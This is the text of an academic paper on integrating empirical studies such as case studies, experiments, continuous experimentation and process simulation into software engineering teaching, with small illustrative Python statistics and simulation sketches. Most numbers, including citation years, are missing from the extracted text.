https://peerj.com mailto:fabian.fagerholm@helsinki.fi https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. software development, software engineering education must enable students to understand such environments and to apply knowledge properly and effectively. however, restrictions in the academic curriculum and the complexity and criticality of real software products limit the level of realism that can be achieved in education. as problems are narrowed down to be manageable, practical relevance is lost through scope and problem size limitations and the use of artificial settings instead of real-world problems. many effects only become visible over long time periods, e.g., the efficiency of a particular method or eventual impact of a design decision. often, time is too limited to provide adequate means to experience such effects in a single course. the same problem occurs in practitioner training. industry must quickly develop solutions and services in order to deliver customer value and, eventually, survive in market competition. empirical evidence may not be easily available, and practitioners may resort to decision-making based on by biased individual beliefs, negatively affecting the productivity of development teams. over the years, we have implemented empirical instruments in software engineering courses to ( ) provide an environment in which students can experience real-life problems while increasing their motivation and the quality of learning outcomes, ( ) pave the way for conducting research in collaboration with industry, and ( ) apply these instruments in industry for training purposes. in our experience, this approach has been well suited to prepare students for working life. training in empirical instruments, such as experimentation or case study research, and direct experience of the value provided by them, has encouraged our students to apply their acquired knowledge in practice, and to explore problems, new methods, and new tools in a systematic and evidence-based manner. since empirical instruments are well accepted for conducting (applied) research in industry, and since students can form their own experiences when doing empirical studies, we claim that utilizing empirical instruments in teaching increases the quality as well as the practical relevance of se education. we show how different instruments, ranging from controlled experiments to qualitative studies, can be used for teaching purposes. we also consider overarching approaches that situate empirical studies in a larger context. we systematize purposes and challenges of the different study types, discuss the validity of the results that can be obtained in a teaching context, and create a link between teaching and research. we use a selection of representative studies to discuss the impact on teaching as well as on industry relevance. the guidelines developed in this paper provide a systematic collection of purposes, learning goals, challenges, and validity constraints, and aims to support teachers in selecting proper study types for inclusion into their courses. the remainder of this paper is structured as follows. ‘related work’ reviews related work on empirical studies as a teaching instrument. ‘research approach’ describes the research approach taken in this paper. 
‘an overview of empirical study types for software engineering education’ discusses empirical instruments in se education and provides an initial taxonomy of them. ‘a guideline for integrating empirical studies with software engineering courses’ presents the main contribution of the paper: a guideline for integrating empirical studies with software engineering courses. ‘experiences’ gives examples of implementing empirical instruments in university education and discusses the fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implications of integrating them into courses. ‘conclusion’ provides conclusions and lists possible future work. related work experiments and other types of empirical studies are key to the scientific approach. empirical studies are performed in research for many different purposes, such as understanding real-world phenomena, testing hypotheses, and validating theories (wohlin et al., ; runeson et al., ; kitchenham, budgen & brereton, ). empirical studies, especially experiments, are established only in few disciplines. the use of empirical studies as teaching tools is less common than, for example, classroom exercises and lectures. in many areas, such as software engineering, such utilization of empirical studies is still uncommon compared to learning tasks that involve reading or writing about existing research, and individual exercises that focus mainly on small-scale technical implementation. empirical studies in teaching in other disciplines physics education may be a prime example where, due to the historical development of the discipline, experiments have a central pedagogical role. beyond their function as means for verifying or refuting theories, experiments in physics have a generative function with relevance for education and learning (koponen & mäntylä, ). while the type of problems in physics and software engineering are different, experiments play a similar role for learning in both. an example of another discipline, also different in nature from physics, that already has a high level of maturity in using experiments for teaching purposes is economics. experiments became widespread teaching tools in economics in the s (parker, ). nowadays, many economists use experiments as educational tools. parker ( ) mentions several benefits of using experiments: they are distinctive and more participative, and in consequence, students are likely to remember lessons associated with them. parker also mentions that the experiential component in experiments can be very important and that students and instructors usually think that experiments are fun. experiments can be used as part of many educational approaches. for example, experiments could be used in different ways with problem-based learning (pbl) (barrows & tamblyn, ; wood, ). in pbl, students define their own learning objectives connected to a problem scenario, while the tutor ensures that the objectives are ‘‘focused, achievable, comprehensive, and appropriate’’ (wood, ). one possibility is to have the tutor guide students towards objectives that involve different degrees of experimentation, e.g., formulating research questions, defining research designs, or even carrying out studies with real or simulated data. the tutor may provide data as part of the problem scenario; it may be part of the trigger material provided to students. 
experiments can also be used as part of project-based learning (blumenfeld et al., ), where students actively explore real-world challenges and problems. instructors can introduce experiments when important decision-making and knowledge acquisition needs emerge. in order to support the design of constructive education with experiments embedded, as well as to support experimentation within more traditional teaching, teachers would benefit from guidelines or sets of ready-made experiment templates that they could use fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. either when planning or dynamically during teaching. the serc portal for pedagogy in action, created by ball et al. ( ), provides a repository of classroom experiments. ball et al. define such experiments as ‘‘activities where any number of students work in groups on carefully designed guided inquiry questions’’. students collect data through interaction with typical laboratory materials, data simulation tools, or a decision-making environment, as well as ‘‘a series of questions that lead to discovery-based learning.’’ the repository includes a comprehensive list of experiments from different disciplines that can be used for replication in classroom settings. in addition, it contains references to scientific studies that provide empirical evidence about the expected positive effects of experiments as teaching tools. an example is an empirical investigation of the impact of classroom experiments on the learning of economics (frank, ). several of the cited studies show a higher academic achievement (e.g., measured as increase in students’ homework scores) when using experiments compared to control classes where standard lectures are used. ball et al. ( ) also cite studies that show improved student satisfaction with teaching pedagogy when using experiments. the repository also contains guidelines for designing and conducting experiments as part of teaching. the guidelines include important aspects such as strategies for unexpected outcomes of experiments. requirements for applying empirical studies in teaching the discussion regarding the suitability of experiments mainly focuses on criteria that need to be fulfilled for designing successful experiments, the balance between practical work and theory, and the suitability of students as experimental subjects. parker ( ) mentions basically three criteria: ( ) the experiment must be aligned with the central topic of the course, ( ) the concept to be taught through the experiment should not be easily understood without the experiment or already be obvious, ( ) students need to be able to quickly learn the necessary prerequisites for participating in the experiment. dillon ( ) provides an overview of advantages and disadvantages of experiments based on empirical findings. an important conclusion drawn from the overview is that successful observation of a phenomenon as part of an empirical study should not be an end in itself. rather, students should have enough time to get familiar with the related ideas and concepts associated with the phenomenon. empirical studies in software engineering education in software engineering, experimentation was established in the s. basili, selby & hutchens ( ) were among the first to present a framework and process for experimentation. since then, software engineering experiments in classroom settings have become more common. 
however, the focus of most of such experiments has been to gain research knowledge, with students participating as research subjects. less attention has been paid to using empirical studies with an educational purpose in mind, where the experiment has an explicit didactic or experiential role. few curricula are available that include the execution of empirical studies as an integral part of a lecture (e.g., kuhrmann, fernández & münch, ; hayes, ). the use of students as experimental subjects has often been discussed in the literature. in software engineering, the topic has mainly been analysed for understanding the suitability fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of students as subjects compared to professional practitioners as subjects. an example of such an investigation has been presented by runeson ( ). carver et al. ( ) note that while it is common to carry out empirical studies in software engineering with students as subjects, the educational value of the studies is often overlooked. simultaneously, solving the pedagogical challenges involved is not straightforward. carver et al. discuss costs and benefits for researchers, students, instructors, and industry, and provide a check-list with advice for carrying out empirical studies with student subjects. the same authors have later extended their check-list with requirements for successful empirical studies with students, based on previous literature (carver et al., ). the check-list includes items addressing considerations before a class begins, as soon as it begins, when the study begins, and when the study is completed. the authors emphasise integration of the study and course topic and schedule, documentation, and considerations of study validity. only few studies have investigated the impact on learning of empirical studies in the curriculum. we expect that the effect is generally positive as long as the integration is carried out properly. staron ( ) finds that students’ learning process is improved and that including carefully designed experiments into software engineering courses increases their motivation. a large majority ( %) of students who participated as subjects in the experiments found them useful, and the number of high-passes increased by % after introducing experiments. while many articles report on empirical studies using student subjects, and some articles report on the educational benefits of such studies for students, few papers address empirical studies as an overall strategy for software engineering education. in particular, there is a lack of guidance for using empirical studies in software engineering education in cases where students may not only be research subjects but could also be involved in carrying out the studies. an overview that discusses different types of empirical studies, their suitability for education, as well as challenges with respect to their execution is missing. research approach the goal of this paper is to develop guidelines that help teachers integrate empirical instruments in software engineering education. the guidelines are based on a reflective analysis of our experiences with teaching courses that use empirical elements to support learning objectives. a reflective approach has been recognised by many educational researchers as a prerequisite for effective teaching (e.g., hatton & smith, ; cochran- smith, ; jones & jones, ). 
reflective practice, with roots in the works of dewey ( ) and schön ( ), calls for continuous learning through deliberate reflection in and on action. using empirical instruments in software engineering education is a way to encourage students to reflect, but teachers should do the same. this paper represents one outcome of reflection-on-action: we analyse materials, assignments, notes, course syllabi, schedules and structures, evaluation data, and recollections of important factors in a number of our own courses, and derive guidelines that we believe would help teachers implement similar courses. our approach is mainly qualitative and has proceeded from gathering a list of study types through analysis of materials and experiences relevant to each study type to the guideline fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proposed in this paper. here, analysis refers to categorisation of materials and identification of connections and relationships between categories. our main goal of developing the guideline helped to scope our investigation, and we thus left out material which did not serve this goal. we began by sifting through parts of the published literature on software engineering education and methods in order to shape a first outline of a taxonomy of study types. in particular, we were influenced by höst ( ) and carver et al. ( ) when considering software engineering education, and by shull, singer & sjøberg ( ) and kitchenham, budgen & brereton ( ) when considering the methodological aspects. our search was purposive rather than systematic, as we sought to construct a taxonomy (see ‘an overview of empirical study types for software engineering education’) for use in the guidelines rather than for the purpose of representing the state of the art in the scientific literature. after constructing the taxonomy, we analysed qualitative data from our own courses and arranged it according to five categories: ( ) learning goals, purposes, challenges, and validity, ( ) establishing context and goals, and determining a study type, ( ) motivating students, ( ) scheduling, ( ) other considerations. we summarised the qualitative data in each category by removing the details specific to our courses and generalising the insights so that they can be applied more broadly. we then constructed the guideline by cross-referencing the categories so that the purpose, challenges, and validity concerns relevant for each study type is shown. the result is given in ‘a guideline for integrating empirical studies with software engineering courses’. finally, we revisited the material from our courses and picked examples that illustrate how we tackled some of the choices teachers face when using empirical instruments for education. we also addressed the specific question of evaluating our teaching by providing data from formal as well as informal evaluation (see ‘experiences’). this serves as a first validation of the guidelines. an overview of empirical study types for software engineering education the software engineering literature includes a number of empirical studies with students, and often these studies were conducted in an educational setting. in this section, we give an overview of (empirical) study types utilised in software engineering education. we list common instruments from empirical software engineering and provide examples of how these instruments can be applied to teaching. 
the overall goal of this section is to summarise different study types that can be used in software engineering education. the summary supports the development of an initial common taxonomy that categorises study types. the taxonomy helps to determine the appropriateness of a particular instrument in a specific setting. a concise overview of the study types, including a brief description and outline of the potential positive educational aspects, is given in table . case studies case studies aim to investigate a phenomenon in its natural context. when utilised for educational purposes, case studies can omit some aspects of a full research design (yin, fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table summary of empirical study types. type description potential for education case study investigate phenomenon in its natural context. especially suitable for exploratory and explana- tory designs. results grounded in context. gaining observational and analytic skills. observing real scenarios with real objectives and constraints. knowledge of high rele- vance for professional use. formal and semi-formal experiment investigate effect of treatment under controlled conditions. rigorous design requirements. re- sults constitute tests of a theory. demonstrate the real impact of theory. gain skills to formulate and test a theory. continuous experimentation constant series of experiments to test value creation, delivery, and capture of software or software-based products. results of experiments can be used to make design decisions. understand connection between software development and business and customer domain. gain skills to test product assump- tions to provide evidence for product deci- sions. software process simulation simulation model used as abstraction of a real process. cost and time advantages can be ob- tained. requires a valid model. gain understanding of process dynamics and complexity with limited resources. ex- perience effects of decisions. individual studies e.g., bachelor’s or master’s theses. focused work on a specific problem for a limited time. various studies are possible. learn to conduct a study in a self-organised manner. gain domain knowledge. further instruments augment or provide context for aforemen- tioned study types, e.g., replication studies, oss projects. provide ways to enhance other study types. ), but can borrow from design science methodology (hevner et al., ) where an artefact is designed, implemented, and evaluated in order to learn. when performing case studies with industry, the context is provided by business objectives and realistic constraints (brügge, krusche & alperowitz, ). industry aims to develop results which contribute to solving a problem with relevance in their settings. for instance, developers can be trained in a close-to-reality environment, aiding the understanding of situations that will occur in the (near) future. on the other hand, researchers perform case studies to understand and capture phenomena in their natural context. depending on the rigorousness of the study design, both practitioners and researchers benefit from a case study due to its grounding in realistic settings. apart from ‘‘normal’’ case study research, teachers can use the case study instrument to help motivate students by providing problems with visible real-life applications. 
case studies also help teachers to transmit procedural knowledge, as students are required to formulate problems and design solutions, and to evaluate them. case studies help answering explanatory questions of the type ‘‘how?’’ or ‘‘why?’’ they should be based on an articulated theory regarding the phenomenon of interest (yin, ). a case study can then provide additional evidence for a theory, help to modify or refine a theory, or suggest an alternative theory that better fits the observations. furthermore, a case study can also be utilized to discover (new) interesting and relevant issues. case studies can be implemented in different ways. they can be categorized as single- or multiple-case, holistic or embedded (wohlin et al., ; runeson et al., ; yin, ), or as intrinsic (stake, ; baxter & jack, ). they can be deductive or inductive, exploratory or fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. confirmatory, and they can make use of both quantitative and qualitative data (yin, ; eisenhardt, ). in the context of teaching, the normal case study setup is a holistic single-case study in which a single instance of the unit of analysis (case) is examined. more complex designs, e.g., multiple-case studies, increase the value of the study results for research. however, these aspects can be considered less important for teaching. furthermore, setting up a case study—even in teaching—requires an environment in which the phenomenon of interest occurs naturally. case studies are a valuable source for generating diverse results. from the industry point of view, case studies help to elaborate and understand the value given by reaching the case objective, ranging from increased technological understanding to increased understanding of customer value of a product or service. they help uncover real technology- and knowledge-related challenges involved in reaching the objective and, thus, provide information on the cost, effort, and risks involved in the case. from the perspective of researchers, case studies can contribute to the development of general—but context- bound—technological rules, including case-specific insights and lessons learnt. given replication with multiple cases, the rules can also reach the level of more general theory. moreover, case studies can be fruitful grounds for exploration and help to discover or identify research questions. from the teaching perspective, case studies serve several purposes of which gaining observational and analytic skills are the most important. case studies help participants to get insights into a setting in which a particular phenomenon occurs. therefore, analysing problems and deriving tasks to solve the problem happens in real scenarios rather than synthetic situations. solutions can be evaluated against real objectives and constraints. consequently, this kind of learning produces knowledge of higher relevance for professional use, and teaching directly addresses subject matter and procedural knowledge related to a specific problem type. examples of case studies in teaching fagerholm, oza & münch ( ) describe the software factory, which is an instrument to combine software development education and training with conducting empirical research. a fruitful ground for this kind of teaching is global software development, as demonstrated by, e.g., oza et al. ( ), richardson, milewski & mullick ( ), and deiters et al. ( ). 
in the software factory environment, students work with a company on a real software development project, providing a level of realism that is not available in a regular course exercise. this realism, along with the opportunity to work in a team setting provides the potential to conduct case studies with educational relevance. formal and semi-formal experiments according to wohlin et al. ( ), an experiment (controlled experiment) is defined as ‘‘an empirical inquiry that manipulates one factor or variable of the studied setting.’’ different treatments are applied, or treatments are assigned to different subjects, to measure effects on variables of interest. if treatment is not randomly assigned, we speak of a ‘‘quasi-experiment.’’ experiments aim to investigate settings in which the environment fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. is under control, and effects of interest are investigated by manipulating variables. for instance, if the efficiency of a particular method is subject to investigation, one experiment group is assigned to solve a problem with the ‘‘new’’ method, while another group works on the same task, but using another method. results are then compared, e.g., to accept or reject a hypothesis. thus, experiments can be utilised to test theories and conventional wisdom, explore relationships, to evaluate the accuracy of models, and to validate measures. importantly, experiments should always provide a detailed context description, showing the settings in which certain claims are true, and in which certain techniques or tools are beneficial. experiments require rigorous design. wohlin et al. ( ) present an experiment process which consists of scoping, planning, operation, analysis and interpretation, and presentation and packaging. however, providing a general experiment design is demanding, as the design depends on the respective subject and context. apart from the general experiment process, several smaller guidelines exist to direct researchers through the process, e.g., the goal template from the tame project (basili & rombach, ), experimentation packages providing reusable designs, templates, and so forth (e.g., in the context of self-organizing project teams (kuhrmann & münch, b), we created such a template; another example can be found in fucci, turhan & oivo ( )), and, pragmatically, case study designs, which can be derived from, e.g., runeson & höst ( ), who provide advice on planning and a guideline on reporting case study research. experiments provide several trade-offs for the conducting parties. however, the usefulness depends on the respective context. for instance, while the importance of experiments in research is not questioned, experimentation in industry has to be considered in terms of business value (e.g., by providing new, efficient methods or creating and evaluating software prototypes, paving the way for new products). requirements regarding the validity of the results differ as well as the general scope of experiments. furthermore, as we have previously discussed, small and very small companies usually have insufficient resources to invest in the necessary preparation and allocation of resources (kuhrmann, ). nevertheless, experimentation allows for, e.g., evaluating different methods and tools, building a hypothesis, and testing the hypothesis. 
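as a concrete illustration of the group comparison described above, the following minimal python sketch analyses a hypothetical classroom experiment in which one group solves a task with the "new" method and a second group uses the existing one; the numbers are invented placeholders, and welch's t-test is only one of several defensible choices for such small samples.

```python
# minimal analysis of a two-group classroom experiment
# (all numbers are invented placeholders for illustration)
from scipy import stats

# task completion times in minutes, one value per student
new_method = [42, 37, 50, 45, 39, 41, 48, 44]   # treatment group: "new" method
old_method = [55, 49, 61, 47, 58, 52, 60, 51]   # control group: existing method

# welch's t-test: is the difference in mean completion time plausibly due to chance?
t_stat, p_value = stats.ttest_ind(new_method, old_method, equal_var=False)

print(f"mean new method: {sum(new_method) / len(new_method):.1f} min")
print(f"mean old method: {sum(old_method) / len(old_method):.1f} min")
print(f"t = {t_stat:.2f}, p = {p_value:.4f}")
# students then decide whether to reject the null hypothesis of equal means,
# and discuss effect size, sample size, and threats to validity
```

walking students through such an analysis makes the link between the experiment design and the accept-or-reject decision explicit with only a few lines of code.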
furthermore, experiments help to confirm conventional wisdom, e.g.: ‘‘everybody says that follow-the-sun development is fast but expensive—is this also true for our situation?’’. examples of experimentation in teaching for teaching, experiments can be a valuable source for knowledge and experience. for instance, experiments can be used to elaborate the real impact of theoretical concepts: in kuhrmann & münch ( b), the theoretical concept taught was the well-known tuckman model (tuckman, ), and in a complementing experiment, students could experience the effects of group dynamics themselves, e.g., changing team set-ups or external influences. another experiment reported in kuhrmann & münch ( a) creates a setting in which students can experience the crucial role of communication (and absent communication) in distributed development set-ups. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in kuhrmann, fernandez & knapp ( ), we present a controlled experiment on the perception of software process modelling paradigms. a german ngo sponsored a process description, which the students had to analyse and improve according to a given approach (kuhrmann, fernández & münch, ). students used two different process development environments, each implementing a different modelling paradigm. they went through the process life cycle, learned about analysis-, design-, and realisation tasks, and conducted result assessments. furthermore, the experiment outcomes showed advantages and disadvantages of the particular modelling paradigms. continuous experimentation continuous experimentation refers to a constant series of experiments to test the value of software capabilities such as features early in its design process (fagerholm et al., a; fagerholm et al., ). the major driver is the industrial need to better understand product value delivery, so that development activities can be focused on delivering only capabilities that create value for users or customers. our experience shows that it is a mistake to ignore the value aspect in se education, as it is a critical part of understanding software requirements. this is especially relevant in complex domains where requirements are unknown and cannot be elicited up front. in contrast to empirical software engineering that usually focuses on technical product or process aspects from a developer perspective, the purpose of continuous experimentation is to validate assumptions that are underlying a business model or a product roadmap. the perspective is usually that of a product owner or entrepreneur. continuous experimentation is a means to evolve business models, product roadmaps, or feature scopes based on validated assumptions. it is based on approaches such as lean startup (ries, ) and customer development (blank, ), and enforces product managers and developers to connect with real users (e.g. through interviews or by analysing usage data) in order to test critical assumptions and make evidence-based product decisions. this typically requires, e.g., the execution of experiments in a scientific style and the implementation of feedback channels that allow observing user behaviour. for teachers, it is a great challenge to instruct students accordingly, as classic software engineering teaching is usually separated from value considerations. 
thus, creating a mind-set in which value creation is the baseline for all development tasks impacts the way software development is performed in the sense that decision-making is based on continuously obtained evidence about customer value. in order to conduct continuous experimentation, different designs can be applied depending on the hypotheses or study goals under investigation. a typical design is a case study consisting of a sequence of build-measure-learn cycles that develop a so-called minimum viable product (mvp). simply speaking, an mvp is a prototype that allows for testing with potential customers. such testing requires a design to quickly obtain customer feedback during the study. in consequence, access to potential customers is needed to conduct such studies. from the industry perspective, continuous experimentation results in knowledge that supports or refutes assumptions about product value. an mvp might result from an experiment. such a result might consist of a working prototype as well as data or fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. lessons learnt about the customer value of the prototype, its development process, and potentially about relevant customer segments. the study might also contribute to testing of other critical assumptions of a business model, such as assumptions about customer relationships or channels. for researchers, continuous experimentation helps to better understand processes, methods, techniques, tools, and organizational constraints regarding building the ‘‘right’’ software. from the teaching perspective, continuous experimentation helps students understand the connection between software development techniques and business. since such experiments must begin by analysing product-related assumptions, students naturally come into contact with the product’s business model. they must then make the link between such assumptions and the corresponding technical implementation and devise an experiment which allows them to refute or support the highest-priority assumption, yielding evidence for a product-related decision. continuous experimentation can thus foster the awareness of relevant criteria for software beyond cost, reliability, and effort, e.g., usability, usefulness, success (e.g., contribution to a higher level organizational goal), and scalability (e.g., monetization from a significant amount of users). examples of continuous experimentation in teaching fagerholm et al. ( a) present building blocks for continuous experimentation and describe the execution of three student projects that aim at conducting build-measure- learn loops. these projects were performed in cooperation with a start-up and sought to understand aspects such as future development options or scalability issues of a new service. the projects helped to evolve the product roadmap and led to several technical pivots where previous assumptions were invalidated and new options found. students gained significant insights in the connections between technical and business considerations. a process model and infrastructure architecture model for continuous experimentation are described in fagerholm et al. ( ). kohavi et al. ( ) describe continuous experiments from an industry perspective. the authors present a system for constant experimentation at microsoft. they emphasize that learning addresses many aspects beyond understanding experimentation techniques. 
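complementing the reported examples, the sketch below shows, in python and with invented numbers, how students might test a single product assumption using usage data collected through an mvp's feedback channel; the assumption, the variant names, and the counts are all hypothetical.

```python
# testing a product assumption with usage data from an mvp
# (assumption, variant names, and counts are hypothetical)
from math import sqrt
from scipy.stats import norm

# assumption under test: "the redesigned onboarding flow increases sign-up completion"
completed_a, shown_a = 48, 400    # variant a: current flow
completed_b, shown_b = 74, 410    # variant b: redesigned flow shipped as mvp

p_a, p_b = completed_a / shown_a, completed_b / shown_b
pooled = (completed_a + completed_b) / (shown_a + shown_b)
se = sqrt(pooled * (1 - pooled) * (1 / shown_a + 1 / shown_b))

z = (p_b - p_a) / se
p_value = 2 * norm.sf(abs(z))     # two-sided two-proportion z-test

print(f"completion a: {p_a:.1%}, completion b: {p_b:.1%}")
print(f"z = {z:.2f}, p = {p_value:.4f}")
# the result feeds the "learn" step of the build-measure-learn cycle:
# support or refute the assumption, then decide whether to persevere or pivot
```

in industrial settings such as the one described by kohavi et al., the statistics are usually the easy part; the organisational practices around experimentation are harder to learn.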
for instance, it is necessary to learn how to identify and understand the reasons for experiments in an organization. in addition, learning needs to address a change of the company culture towards experimentation. software process simulation experimentation is a costly way to learn. it requires, for instance, significant preparation of experimental materials and treatments. software process simulation refers to the use of a simulation model as an abstraction of a real process. typical purposes for using such models are experimentation, increased understanding, prediction, decision support, or education about a process. assuming that a valid model exists, process simulation promises advantages with respect to cost. since part of the process can be conducted virtually, the number of controlled variables can be much higher than in real experiments, and calibrating the model to a specific context can be done efficiently. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. simulation may be a suitable teaching aid in many situations, but should be used only when a valid model can be obtained. otherwise, there is a risk that students observe effects that are not realistic and thus incorrect learning might occur. well-researched models with extensive validation are necessary. other disciplines such as mechanical engineering or molecular chemistry already use simulation to analyse technologies and processes and thereby reduce the need for real experiments. in software engineering, this trend is still focused towards product aspects such as understanding the dynamic behaviour of control software. however, simulation has already been applied successfully for understanding and analysing software processes as well as for educational purposes. process simulation can be combined with real software engineering experiments—for example, by using empirical data to calibrate a model or by comparing such data with simulation results—or used as such. simulation-based experiments can be classified by the number of treatments and the number of subject groups per treatment. in case of single project studies (i.e., one treatment and one group), simulation requires initialization of appropriate input parameters and calibration to the context. in case of multi-project variation (i.e., more than one treatment and one group), the simulation model needs to be calibrated to different contexts. replications (i.e., one treatment but more than one group) basically refer to several simulation runs, typically with statistically based variations. in case of blocked subject-project studies (i.e., more than one treatment and more than one team) simulation model development requires a good understanding of cause–effect relations in varying contexts. combining simulation with experiments can be done in the following ways: • empirical knowledge from real experiments can be used for creating the simulation model (e.g., to calibrate the simulator) • results from simulation runs can be used for designing real experiments (e.g., to identify and investigate new hypotheses before performing expensive real experiments) • both can be done in parallel (e.g., to broaden the scope of the experiment). from the research perspective, software process simulation can be seen as an additional, efficient mechanism to gain knowledge about the effects of processes in different contexts. 
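to give a flavour of what even a deliberately simple process simulation can show, the toy model below (python, with invented parameters) tracks remaining work over a number of weeks for two process variants that differ in the effort spent on reviews; it is an illustrative toy for classroom discussion, not a validated simulation model.

```python
# toy software process simulation for classroom discussion
# (all parameters are invented; this is not a validated simulation model)
import random

def simulate(weeks, velocity, defect_rate, review_effort, seed=1):
    """return remaining backlog per week for one process variant."""
    random.seed(seed)
    backlog = 100.0                                   # initial work units
    history = []
    for _ in range(weeks):
        capacity = velocity * (1 - review_effort)     # effort left after reviews
        completed = min(backlog, random.uniform(0.8, 1.2) * capacity)
        rework = completed * defect_rate * (1 - review_effort)  # more review effort, less rework
        backlog = backlog - completed + rework
        history.append(round(backlog, 1))
    return history

no_reviews   = simulate(weeks=12, velocity=10, defect_rate=0.4, review_effort=0.0)
with_reviews = simulate(weeks=12, velocity=10, defect_rate=0.4, review_effort=0.2)

print("remaining backlog, no reviews:  ", no_reviews)
print("remaining backlog, with reviews:", with_reviews)
```

students can vary the parameters and immediately see the consequences of their decisions; a genuine software process simulation model, calibrated and validated as discussed here, goes far beyond such a toy.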
it especially allows for analysing situations that are difficult, expensive, or impossible to analyse in real experiments, and it allows for flexible variations of the context and the controlled variables. from the educational perspective, simulation helps to gain a better understanding of the dynamics of software development processes, getting immediate feedback, and experiencing the effects of decisions. feedback can be obtained quickly using time-lapse effects. when creating the model, students gain insights into cause–effect- and other relationships. creating a simulation model promises to improve understanding of the key factors and complexity of a specific software process. from an industry perspective, learning cycles can be accelerated, risks mitigated, and the impact of processes, technologies, and their changes can be better understood. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. examples of software process simulation in teaching several educational software engineering simulation environments have been developed and are used for teaching purposes. examples are the comprehensively evaluated simse environment (navarro & van der hoek, ), and the sesam (software engineering simulation by animated models) environment (ludewig et al., ). münch, rombach & rus ( ) have developed a laboratory that allows to systematically combine real and virtual experiments and demonstrate the benefits of such a combination for teaching purposes. individual studies all aforementioned study types allow for teamwork and training specific team-related skills. however, software engineering education also comprises several individual tasks, which are often performed by students while they work (for a limited time) in industry or while they write their theses (e.g., bachelor’s or master’s thesis, or semester projects). although individual studies can be performed in industry-academia collaborations, they are usually conducted by individual students who work on a specific task and simultaneously perform the study. the student is thus a participant-observer in such studies. individual studies depend on the setting in which they are carried out, e.g., requirements for a semester project differ from those of a master’s thesis. different study types can be applied. individual studies have high requirements regarding the study design, as they all have limited resources and strict time constraints in common. specific challenges are scoping the study, narrowing down research questions, and defining the expected outcome. since individual students conduct single studies, results are often limited to proofs of concept or demonstrators. finally, data generated in this kind of study is often isolated, requiring a defined context to which it can contribute, e.g., a more comprehensive research strategy within which a particular study investigates one small aspect. although limited, the results of the study can have inherent value to research and practice. for research, the study may contribute to a better understanding of research questions and might be a starting point for further, more comprehensive studies. from the industry perspective, individual studies allow investigating a specific problem in a well-defined environment and, due to their limitations, analyses are limited to a specific problem. 
for instance, if the objective of the study is to develop an algorithm or to examine the feasibility of a specific method, a case study can be conducted explicitly focusing on this aspect, resulting in a statement which then provides rationale for further investigation. if the individual study is combined with an internship, students can summarise existing research on a topical area that can then be used as training material for company employees. finally, when students graduate, companies may wish to employ them (they already know the student). from an educational perspective, students have to work in a self-organised manner, and they learn how to set up and conduct a problem-oriented study (including all effects, e.g., stakeholder interaction, study planning, data collection, etc.). furthermore, students get further specific domain knowledge beyond the more general knowledge they acquire at university. fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. examples of individual studies in teaching rein & münch ( ) describe an individual student study that was performed as part of a seminar thesis. the study aims at analysing features of a mobile app and consisted of design, instrumentation of the app with appropriate measurement instruments, and analysis of data from more than ten thousand users. the study results provided valuable, data-based justifications on how to further develop the app. in addition, a new method for analysing feature value was piloted and experiences with the applicability of the method were gained. a popular example for individual studies in industry is the so-called personal software process (psp), a training that consists of a series of systematically defined software engineering exercises. rombach et al. ( ) have analysed data from , engineers conducting the psp. a major finding from this analysis is that the effects of applying software engineering principles can be experienced on an individual level. although the effects of applying such principles typically can only been seen on the larger scale (e.g., large projects, long-lasting development efforts, multi-team developments), this study shows that it is possible to teach these principles also on the individual level. further instruments in the previous sections, we provided an overview of different empirical instruments, a discussion, and examples of their application in teaching. however, there are further means that can contribute to the aforementioned study types. replication studies replication provides an opportunity to learn from an already established research design, and can, if conducted well, contribute additional evidence for a research question. replication repeats empirical studies to solidify their results, test result reproducibility, increase result validity (e.g., easterbrook et al. ( ) and park ( ) consider replication a kind of triangulation), and broaden research context and scope by repetition under similar conditions while changing selected variables, e.g., site, population, and instruments. thus, students can learn from adapting the research design in a new environment and by comparing the results obtained to those of the original study. simultaneously, teachers should prepare students for sometimes large differences in results. lack of generalisability is often cited as a limitation in empirical studies and replication is a step toward creating generalisable knowledge. 
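one simple way to let students compare the results obtained to those of the original study, as suggested above, is to put both studies on a common scale; the python sketch below computes a standardized mean difference (cohen's d) for an original study and a replication, using invented summary statistics purely for illustration.

```python
# comparing an original study and its replication on a common scale (cohen's d)
# (summary statistics are invented for illustration)
from math import sqrt

def cohens_d(mean_t, sd_t, n_t, mean_c, sd_c, n_c):
    """standardized mean difference between treatment and control, pooled sd."""
    pooled_sd = sqrt(((n_t - 1) * sd_t**2 + (n_c - 1) * sd_c**2) / (n_t + n_c - 2))
    return (mean_t - mean_c) / pooled_sd

original    = cohens_d(mean_t=78, sd_t=10, n_t=30, mean_c=70, sd_c=11, n_c=30)
replication = cohens_d(mean_t=75, sd_t=12, n_t=25, mean_c=71, sd_c=12, n_c=26)

print(f"effect size, original study: d = {original:.2f}")
print(f"effect size, replication:    d = {replication:.2f}")
# a noticeably smaller (or larger) effect in the replication prompts discussion:
# changed site, population, or instruments, or a fragile original result?
```

such a comparison only carries weight if the replication stays close enough to the original design, which is exactly where software engineering still struggles.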
